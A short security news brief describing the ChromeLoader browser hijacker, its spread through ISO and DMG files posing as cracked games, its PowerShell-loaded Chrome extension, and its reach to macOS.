An uptick has been observed in detections of ChromeLoader malware this month. Since the beginning of the year, there was a constant volume of attacks.
ChromeLoader
ChromeLoader is a browser hijacker that makes changes to victims' web browser settings to show search results promoting fake giveaways, unwanted software, surveys, adult games, and dating sites.
- The malware operators receive financial gains via a marketing affiliation system redirecting traffic of users to advertising sites.
- Additionally, Twitter posts were spotted advertising cracked Android games and offering QR codes leading to malware-hosting sites.
- ChromeLoader is known for volume, infection route, and persistence.
Use of PowerShell
- The ISO masquerades as a cracked .exe for a game or software to fool victims into downloading the file by themselves from torrent or malicious sites.
- If a person double-clicks on the ISO file in Windows 10 or later, it is mounted as a virtual CD-ROM drive. This file has a .exe that pretends as a game crack or keygen, named CS_Installer[.]exe.
- Finally, ChromeLoader executes and decodes a PowerShell command to fetch an archive from a remote resource. Subsequently, the archive is loaded as a Google Chrome extension.
- Consequently, a PowerShell script removes the scheduled task, leaving Chrome infected with a silently injected extension that hijacks the browser and tampers with search engine results.
Targets macOS as well
ChromeLoader targets macOS systems as well and manipulates Chrome and Apple's Safari web browsers. Further, the infection chain on macOS uses DMG (Apple Disk Image) files instead of ISO files.
Conclusion
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/06db_shutterstock_1302949384.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_120539989.jpg)
